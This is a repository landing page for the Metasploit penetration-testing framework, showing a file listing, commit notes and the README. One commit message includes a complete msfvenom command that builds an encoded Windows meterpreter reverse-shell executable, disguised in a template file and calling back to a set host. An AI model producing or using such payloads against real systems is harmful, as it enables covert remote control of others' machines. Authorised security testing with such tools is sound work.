Metasploit Framework
 
 
 
 
 
 
Go to file
agix 378208bc3d Move service stub in x86 encoder to be easily used.
Add psexec option SERCVICE_STUB_ENCODER to allow a list of encoder to
encode the x86/service stub.
Add multiple_encode_payload function in payload_generator.rb to accept a
list of encoder (beginning with @ to not break the classic parsing of
encoder).
With this it would be possible to pass multiple encoder to msfvenom in
one execution.
./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80
LHOST=192.168.100.11 -e
@x86/shikata_ga_nai,x86/misc_anti_emu:5,x86/shikata_ga_nai -x
template.exe -f exe-only -o meterpreter.exe
2016-06-23 14:56:03 +02:00
.github Fix link 2016-02-22 15:14:38 -06:00
app Move shared example from pro into framework 2016-04-07 13:09:52 -05:00
config Land #6556, include Vagrant development environment provisioner 2016-06-09 09:55:37 -05:00
data Land #6988, Update banners to metasploit.com, not .pro 2016-06-17 15:29:30 -05:00
db still trying to fix these migrations 2016-05-11 14:54:40 -05:00
documentation Land #6934, Adds exploit for op5 configuration command execution 2016-06-16 14:36:10 -05:00
external Kill defanged mode 2016-03-28 09:02:07 -05:00
features use raw file write for cuke 2016-05-12 11:17:53 -05:00
lib Move service stub in x86 encoder to be easily used. 2016-06-23 14:56:03 +02:00
modules Move service stub in x86 encoder to be easily used. 2016-06-23 14:56:03 +02:00
plugins Remove idle from usage, will implement in the future if needed 2016-05-15 12:32:05 -05:00
script rails generate cucumber:install 2014-08-27 14:10:04 -05:00
scripts switch to inline provisioning, use official ubuntu vagrant box 2016-06-09 09:50:15 -05:00
spec Land #6919, Move LURI into a full URI for a new 'Payload opts" column in jobs output 2016-06-03 13:57:47 -05:00
test Modify stdapi so it also uses exist? over exists? for ruby parity 2016-04-23 17:31:22 -04:00
tools tell the user what to do 2016-06-14 11:54:55 -05:00
.gitignore Merge branch 'master' into vagrant 2016-02-20 09:10:17 -07:00
.gitmodules Add RDI submodule, port Kitrap0d 2013-11-27 16:04:41 +10:00
.mailmap Update .mailmap 2016-06-17 19:01:13 -05:00
.rspec Add modern --require to .rspec 2014-10-08 10:55:40 -05:00
.rubocop.yml Reapply PR #4113 (removed via #4175) 2014-11-11 15:06:43 -06:00
.ruby-gemset Restoring ruby and gemset files 2014-05-20 10:17:00 -05:00
.ruby-version bump ruby version to 2.3.1 2016-05-03 06:23:15 +02:00
.simplecov Remove fastlib 2014-09-18 15:24:21 -05:00
.travis.yml bump ruby version to 2.3.1 2016-05-03 06:23:15 +02:00
.yardopts update .yardopts 2014-07-24 13:59:04 -05:00
CODE_OF_CONDUCT.md Add individual contacts 2016-01-13 10:35:39 -06:00
CONTRIBUTING.md suggest that we should include module docs and links to vuln software 2016-06-09 15:23:32 -05:00
COPYING Update COPYING, too. 2016-01-04 16:31:01 -06:00
Gemfile fix deps 2016-05-13 13:34:18 -05:00
Gemfile.local.example Fix example Gemfile.local to work with existing 2014-06-24 00:00:47 -05:00
Gemfile.lock Module Cleanup 2016-06-11 18:12:42 -05:00
HACKING Update link for The Metasploit Development Environment 2014-07-15 10:16:47 -05:00
LICENSE Update copyright notice to 2016 [ci skip] 2016-01-03 20:25:47 +05:30
README.md Use SVG badges to please the eyes 👀 2015-12-13 00:28:14 +01:00
Rakefile Merge branch 'feature/MSP-11130/metasploit-framework-spec-constants' into feature/MSP-11147/thread-leak-detection 2014-11-05 15:47:59 -06:00
Vagrantfile switch to inline provisioning, use official ubuntu vagrant box 2016-06-09 09:50:15 -05:00
metasploit-framework.gemspec adding tzinfo-data to the gemspec 2016-05-17 11:40:25 -05:00
msfbinscan Fix -h exit status for Omnibus 2015-09-04 10:24:49 -05:00
msfconsole Move service stub in x86 encoder to be easily used. 2016-06-23 14:56:03 +02:00
msfd Initialize the DisableBanner option 2015-10-08 14:08:45 -05:00
msfelfscan Fix -h exit status for Omnibus 2015-09-04 10:24:49 -05:00
msfmachscan Fix -h exit status for Omnibus 2015-09-04 10:24:49 -05:00
msfpescan Fix -h exit status for Omnibus 2015-09-04 10:24:49 -05:00
msfrop Fix -h exit status for Omnibus 2015-09-04 10:24:49 -05:00
msfrpc Change {} back to do/end 2015-03-09 00:00:49 -05:00
msfrpcd allow overriding the default timeout for a session 2015-05-01 15:04:55 -05:00
msfupdate File.exists? must die 2016-04-21 00:47:07 -04:00
msfvenom reenable jar format 2016-05-09 21:25:23 +02:00

README.md

Metasploit Build Status Code Climate

The Metasploit Framework is released under a BSD-style license. See COPYING for more details.

The latest version of this software is available from: https://metasploit.com

Bug tracking and development information can be found at: https://github.com/rapid7/metasploit-framework

New bugs and feature requests should be directed to: http://r-7.co/MSF-BUGv1

API documentation for writing modules can be found at: https://rapid7.github.io/metasploit-framework/api

Questions and suggestions can be sent to: https://lists.sourceforge.net/lists/listinfo/metasploit-hackers

Installing

Generally, you should use the free installer, which contains all of the dependencies and will get you up and running with a few clicks. See the Dev Environment Setup if you'd like to deal with dependencies on your own.

Using Metasploit

Metasploit can do all sorts of things. The first thing you'll want to do is start msfconsole, but after that, you'll probably be best served by reading Metasploit Unleashed, the great community resources, or the wiki.

Contributing

See the Dev Environment Setup guide on GitHub, which will walk you through the whole process from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more information, see Contributing.